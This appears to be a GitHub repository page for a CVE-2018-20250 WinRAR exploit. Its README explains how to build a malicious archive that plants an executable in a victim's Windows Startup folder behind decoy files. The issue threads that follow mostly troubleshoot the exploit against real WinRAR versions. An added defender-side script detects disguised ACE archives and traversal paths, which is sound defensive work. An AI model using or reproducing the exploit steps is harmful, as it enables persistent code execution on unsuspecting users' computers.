
cve-2018-20250's Introduction

exp for Extracting Code Execution From Winrar

poc by Ridter

How to use?

You just need to install Python 3.7 and prepare the evil file you want to run. Set the values you want, and this exp script will generate the evil archive file automatically!

  1. Set the values you want:
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such as the one shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different; it depends on your Python 3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  2. Run the exp; it generates test.rar automatically.

  3. If the victim opens test.rar, he will see the files hello.txt and world.txt. You can also add more files, more attractive files.

  4. When he unpacks the archive, the victim's user startup directory will have one more file named hi.exe, which is actually calc.exe. When he restarts the computer, hi.exe will run.

have fun! :)
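A defender-side check for the archive this README describes, as an added example that is not part of the original repository: it flags ACE content behind a non-.ace extension (the ACE signature `**ACE**` sits at byte offset 7) and stored member paths that carry a drive specifier, a `..` segment, or a Startup-folder target. The function names and the sample header bytes are constructed for illustration, and the member names are assumed to come from a header listing such as `acefile.py --headers`.

```python
import re

ACE_MAGIC = b"**ACE**"        # ACE main-header signature at byte offset 7
RAR_MAGIC = b"Rar!\x1a\x07"   # prefix shared by RAR4 and RAR5 signatures
STARTUP = "start menu/programs/startup"

def sniff_archive(data: bytes, filename: str) -> str:
    """Classify by content and report a mismatch with the file extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else "none"
    if data[7:14] == ACE_MAGIC:
        return "ace" if ext == "ace" else f"ace-disguised-as-{ext}"
    if data.startswith(RAR_MAGIC):
        return "rar"
    return "unknown"

def member_path_findings(name: str) -> list:
    """Return the reasons a stored member path should not be extracted."""
    norm = name.replace("\\", "/")
    findings = []
    if re.search(r"[A-Za-z]:", norm):
        findings.append("drive-specifier")
    if norm.startswith("/"):
        findings.append("absolute-path")
    # Split on ':' as well, so 'C:../x' still exposes its '..' segment.
    if ".." in re.split(r"[/:]", norm):
        findings.append("parent-traversal")
    if STARTUP in norm.lower():
        findings.append("startup-folder")
    return findings

def triage(data: bytes, filename: str, members: list) -> dict:
    """Combine both checks into one verdict for a mail or download gateway."""
    kind = sniff_archive(data, filename)
    bad = {m: f for m in members if (f := member_path_findings(m))}
    return {"kind": kind, "bad_members": bad,
            "block": kind.startswith("ace-disguised") or bool(bad)}

if __name__ == "__main__":
    # Constructed sample: 7 filler bytes, the ACE magic, then padding.
    sample = b"\x00" * 7 + ACE_MAGIC + b"\x00" * 16
    names = ["hello.txt", "world.txt",
             r"C:\C:C:../AppData\Roaming\Microsoft\Windows"
             r"\Start Menu\Programs\Startup\hi.exe"]
    print(triage(sample, "test.rar", names))
```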


cve-2018-20250's Issues

Archive is either in unknown format or damaged

Using WinRAR version 4.20. Running the generated RAR file on Windows 10 x64 1809 results in this error when opening/extracting the archive.

"Cannot create C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"

Odd-length string

Hi there, I'm not sure why there is this error when I want to generate a rar file:
[image]
Could you give a little help? Many thanks.

TypeError: Non-hexadecimal digit found Shellcode

[*] Start to generate the archive file best.rar...
Traceback (most recent call last):
  File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 114, in <module>
    build_file_once(filename_list[i])
  File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 102, in build_file_once
    build_file_add(shellcode, rar_filename)
  File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 98, in build_file_add
    f.write(binascii.a2b_hex(shellcode.upper()))
TypeError: Non-hexadecimal digit found

Using Windows OS

What if the victim does not extract the file in Desktop?

It's not that simple. One thing to mention about this script is that the victim should extract the zip file in Desktop so that through "../" the zip can access the AppData inside of %USERNAME% without knowing the actual username!
So what if it were extracted anywhere else? How could a zip file access the username for extraction?

Error 3

[*] Start to generate the archive file Tet.rar...
'py' is not recognized as an internal or external command,
operable program or batch file.
Traceback (most recent call last):
  File "exp.py", line 114, in <module>
    build_file_once(filename_list[i])
  File "exp.py", line 103, in build_file_once
    shellcode_new = modify_hdr_crc(shellcode, rar_filename)
  File "exp.py", line 58, in modify_hdr_crc
    hdr_crc_raw = get_right_hdr_crc(filename)
  File "exp.py", line 54, in get_right_hdr_crc
    right_hdr_crc = result[0].upper()
IndexError: list index out of range

error: unable to create process --- acefile.py --headers test.rar

When I run your script, this error is shown:
F:\test winrar\37>python exp.py
[*] Start to generate the archive file test.rar...
Unable to create process using '"C:\Program Files\Python37\python.exe" acefile.py --headers test.rar'
Traceback (most recent call last):
  File "exp.py", line 114, in <module>
    build_file_once(filename_list[i])
  File "exp.py", line 103, in build_file_once
    shellcode_new = modify_hdr_crc(shellcode, rar_filename)
  File "exp.py", line 58, in modify_hdr_crc
    hdr_crc_raw = get_right_hdr_crc(filename)
  File "exp.py", line 54, in get_right_hdr_crc
    right_hdr_crc = result[0].upper()
IndexError: list index out of range

Error 2

Hi,
When I run exp.py, this error is shown:

C:\Users\05\Desktop\New folder\CVE-2018-20250-master>py -3 exp.py
[*] Start to generate the archive file test.rar...
Traceback (most recent call last):
  File "exp.py", line 111, in <module>
    build_file(shellcode_head, rar_filename)
  File "exp.py", line 93, in build_file
    with open(filename, "wb") as f:
FileNotFoundError: [Errno 2] No such file or directory: 'test.rar'

Error Bad File Descriptor

[*] Start to generate the archive file test.rar...
Traceback (most recent call last):
  File "exp.py", line 111, in <module>
    build_file(shellcode_head, rar_filename)
  File "exp.py", line 94, in build_file
    f.write(binascii.a2b_hex(shellcode.upper()))
OSError: [Errno 9] Bad file descriptor

Any help to fix that Error?

Unpacking ¯\(°_o)/¯

When unpacking, hi.exe is unpacked by creating another copy of the AppData folder on the desktop. Must be "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup". It turns out "C:\Users\user\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
WinRar 5.61 release.

Not working after update 5.70

Thanks for the source. I tested with WinRAR version 5.61 and it worked, but after the update to 5.70
you will get the error message: WinRAR corrupted or damaged.
